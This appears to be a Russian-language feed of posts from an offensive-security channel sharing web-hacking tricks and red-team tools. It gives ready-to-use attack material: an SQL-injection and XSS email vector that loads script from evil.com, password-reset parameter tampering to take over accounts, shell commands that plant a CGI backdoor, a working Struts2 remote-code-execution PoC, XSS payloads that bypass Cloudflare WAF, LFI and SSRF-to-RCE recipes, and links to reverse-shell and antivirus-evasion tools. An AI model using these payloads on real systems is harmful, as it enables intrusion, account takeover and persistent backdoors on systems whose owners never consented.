После эксплутации инъекции в sql с помощью следующего email адреса

"'-sleep(5)-'"@mail.local

невольно задумываешься: а какого хера это вообще пропустило как валидный email?

В целом, локальная часть (логин, до @) email’а может сожержать спецсимволы по RFC, если она заключена в двойные кавычки. А дальше - уже любимые языки программирования немного отходят от того, какие именно символы можно использовать.

Поэтому, следующая магия:

php -r "echo filter_var('\"\'--><script/src=//evil.com></script>\"@example.com', FILTER_VALIDATE_EMAIL);”

Провалидирует и вполне законно вернет мыло с вектором атаки: "'--><script/src=//evil.com></script>"@example.com

А там как дальше разработчики его отображают - отдельный вопрос.

🖇 Краткий экскурс по захвату поддоменов

Используя захват поддомена, злоумышленники могут отправлять фишинговые электронные письма с легитимного домена, выполнять межсайтовые сценарии (XSS) или наносить ущерб репутации бренда, связанного с доменом.

#web #sto

Читать статью

⛓ icmpdoor - ICMP reverse shell, написанный на Python3

icmpdoor может туннелировать скрытый ICMP канал для управления скомпрометированной машиной. Более подробно про работу с инструментом можно ознакомиться в блоге автора.

Фильтрация ICMP трафика настраивается редко, что позволяет злоумышленникам обходить брандмауэры. В прошлом использование ICMP в качестве бэкдора совершалось по крайней мере одной APT (Advanced Persistent Threat) группой.

#redteam #malware

Ссылка на Github

📮 Добавление электронного адреса в передаваемый параметр для захвата аккаунта

Один из стандартных способов восстановления пароля - это отправка ссылки для сброса на адрес электронной почты, к которой привязан аккаунт.

Можно попробовать перехватить запрос и добавить туда ещё один email адрес. Таким образом, на некоторых сайтах мы можем добиться отправки письма с ссылкой для сброса на подконтрольный нам адрес почты:

▫️Добавление адреса атакующего в параметр через «&»:
POST /resetPassword
[...]
email=victim@mail.com&email=hacker@mail.com

▫️Добавление адреса атакующего в параметр через «%20»:
POST /resetPassword
[...]
email=victim@mail.com%20email=hacker@mail.com

▫️Добавление адреса атакующего в параметр через «|»:
POST /resetPassword
[...]
email=victim@mail.com|email=hacker@mail.com

▫️Добавление адреса атакующего в параметр через «cc»:
POST /resetPassword
[...]
email="victim@mail.com%0d%0acc:hacker@mail.com"

▫️Добавление адреса атакующего в параметр через «bcc»:
POST /resetPassword
[...]
email="victim@mail.com%0d%0abcc:hacker@mail.com"

▫️Добавление адреса атакующего в параметр через «,»:
POST /resetPassword
[...]
email="victim@mail.com",email="hacker@mail.com"

▫️Добавление адреса атакующего в json массив:
POST /resetPassword
[...]
{"email":["victim@mail.com","hacker@mail.com"]}

Реальный пример такой уязвимости можно посмотреть по этой ссылке.

#web

🐍 CGI бэкдор с помощью простого Python сервера

Знаете ли вы, что простой веб-сервер Python может запускать сценарии CGI? В результате вы можете превратить этот удобный маленький веб-сервер в бэкдор.


cd /tmp
mkdir cgi-bin
echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi
echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi
echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi
chmod +x ./cgi-bin/backdoor.cgi
python -m http.server --cgi

wget -q -O - "http://localhost:8000/cgi-bin/backdoor.cgi?whoami"

#python

🔑 Захват аккаунта с помощью изменения адреса почты и пароля любого пользователя через API параметры

Ещё один способ, который может сработать при захвате аккаунта на некоторых сайтах.

▫️Атакующий должен войти со своего аккаунта и запустить функцию смены пароля;
▫️Запускаем Burp Suite и ловим запрос;
▫️После перехвата запроса, отправляем его в Repeater и пробуем изменить параметры Email и Password.

POST /api/changepass
[...]
("form":{"email":"victim@mail.com","password":"12345678"})

#web

🧨 CVE-2020-17530: Удалённое выполнение кода в Apache Struts2

Степень серьезности - критическая. PoC стал общедоступным и может оказать значительное и обширное влияние. Для тех, кто не успел ознакомиться, код ниже.

Python PoC:

# 2.0.0 ~ 2.5.25

import requests

url = "http://127.0.0.1:8080/struts2_showcase_war/hello.action"

data = {
"name": '%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("/System/Applications/Calculator.app/Contents/MacOS/Calculator")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}'
}

res = requests.post(url, data=data)

#rce #cve

Мемы про xss они такие 🤡

📩 Автоматизация поиска SSRF в Burp Suite

В этой статье я поделюсь небольшим советом о том, как можно автоматизировать поиск SSRF.

#web #ssrf

Читать статью

​​📑 Переходим от LFI к удаленному выполнению кода с помощью ZIP-архива

Если веб-сайт с LFI позволяет вам загружать .zip файлы, то для удаленного выполнения кода следует попробовать следующий алгоритм:

1. Создаём .php файл (rce.php);
2. Сжимаем его в архив .zip (file.zip);
3. Загружаем ваш .zip архив на уязвимый веб-сайт;
4. Удаленно выполняем код с помощью:

https://site.com/index.php?page=zip://path/file.zip%23rce.php

#web #lfi #rce

​​🖥 Инструмент для проведения MITM на RDP соединения

Pyrdp создан для проведения MITM атак на RDP и позволяет просматривать RDP-соединения в режиме реального времени или постфактум. Написан на Python3 и имеет открытый исходный код.

Более подробное описание работы можно прочитать в блоге авторов проекта.

Ссылка на GitHub

#soft #rdp #python #mitm

⛅️ Обход Cloudflare WAF

Рабочие на момент публикации полезные нагрузки, для проведения XSS на сайтах с защитой Cloudflare WAF.

<img longdesc="src='x'onerror=alert(document.domain);//><img " src='showme'>

<img longdesc="src=" images="" stop.png"="" onerror="alert(document.domain);//"" src="x" alt="showme">

#web #xss

⛓ Эксплуатация SSRF для доступа с правами админа

Небольшое описание и пример возможностей данной уязвимости на реальном сайте.

#web #ssrf

Читать статью

📁 Полезная нагрузка XSS из XML файла

Полезную нагрузку для XSS можно разместить в .xml файле. Файл xss.xml в таком случае будет выглядеть так:

<?xml version="1.0" encoding="UTF-8"?>
<html xmlns:html="w3.org/1999/xhtml">
<html:script>prompt(document.domain);</html:script>
</html>

#web #xss

📖 Скрытая нагрузка. Обходим антивирус и загружаем Meterpreter из памяти в Windows 10

#malware #av

Инструмент из статьи
Источник

🧨 CVE-2020-35489: Загрузка произвольного файла в плагине Contact Form 7

Свежая критическая уязвимость в одном из самых популярных плагинов для WordPress. На момент публикации статьи минимум 3,5 миллиона сайтов имеют уязвимую версию данного плагина.

#cve #rce

Читать статью

🧨 Переходим от Blind SSRF к RCE:

Один из вариантов, при котором мы можем получить удалённое выполнение кода на сайтах с Blind SSRF:

- Находим 'url=' параметр;
- Проверяем на уязвимость к Blind SSRF;
- С помощью SSRF сканируем 127.0.0.1 и находим открытый порт 6379 (Redis)
- Используем Gopherus для генерации вредоносной ссылки для Redis. Если вы не знакомы с этим инструментом, то рекомендую прочитать данную статью.
- RCE

Redis (port-6379) в данном случае выбран в качестве примера. Инструмент позволяет проводить данную атаку для серверов MySQL (port-3306), PostgreSQL(port-5432), FastCGI (port-9000), Memcached (port-11211), Redis (port-6379), Zabbix (port-10050), SMTP (port-25).

#web #ssrf #rce

🦠 Имитация действий пользователя через обратное соединение

Possessor - инструмент, позволяющий получить обратное соединение с использованием техники имитации пользователя, что не является подозрительным поведением для средств защиты.

По сути, основная идея техники заключается в использовании скрытого вторичного рабочего стола для имитации действий пользователя, минуя при этом анализ антивируса. Подробнее про технику можно почитать здесь.

#malware #av

Инструмент на Github
Видео демонстрация

⛔️ Находим и обходим страницы с ошибкой 403 (доступ запрещен)

Небольшой пример по автоматизации поиска и получения доступа к страницам, к которым доступ запрещен:

▫️Для поиска страниц с ответом 403 используем утилиту dirsearch и выполним команду:

python3 dirsearch.py -r -b -u example.com -i 403 -e php,html,json,aspx,sql,asp,js,txt

▫️Полученные страницы помещаем в .txt файл (например 403.txt).
▫️Устанавливаем утилиту 403bypasser и выполняем команду:

for i in $(cat 403.txt); do python3 403bypasser.py https://example.com/ $i ; done

▫️Ждем результатов с ответом 200 или 302.

Для Burp можем использовать инструмент BurpSuite_403Bypasser.

#web

​​🖼 Взлом с помощью картинки. Полезная нагрузка PHP в изображении.

С помощью инструмента php-jpeg-injector можно производить атаки на веб-приложения, которые запускают изображение .jpeg через графическую библиотеку PHP GD.

Инструмент создаёт новый .jpeg файл с полезной нагрузкой PHP. Зараженный .jpeg файл запускается через gd-библиотеку PHP. PHP интерпретирует полезную нагрузку, введенную в jpeg, и выполняет ее.

#soft #web

Ссылка на GitHub

​​📑 Проводим XSS в CSS теге

Для проведения XSS в теге <style> можно использовать следующую полезную нагрузку:

<style>img{background-image:url('javascript:alert(1)')}</style>

Для обхода WAF:

<style>*{background-image:url('\6A\61\76\61\73\63\72\69\70\74\3A\61\6C\65\72\74\28\6C\6F\63\61\74\69\6F\6E\29')}</style>

#web #xss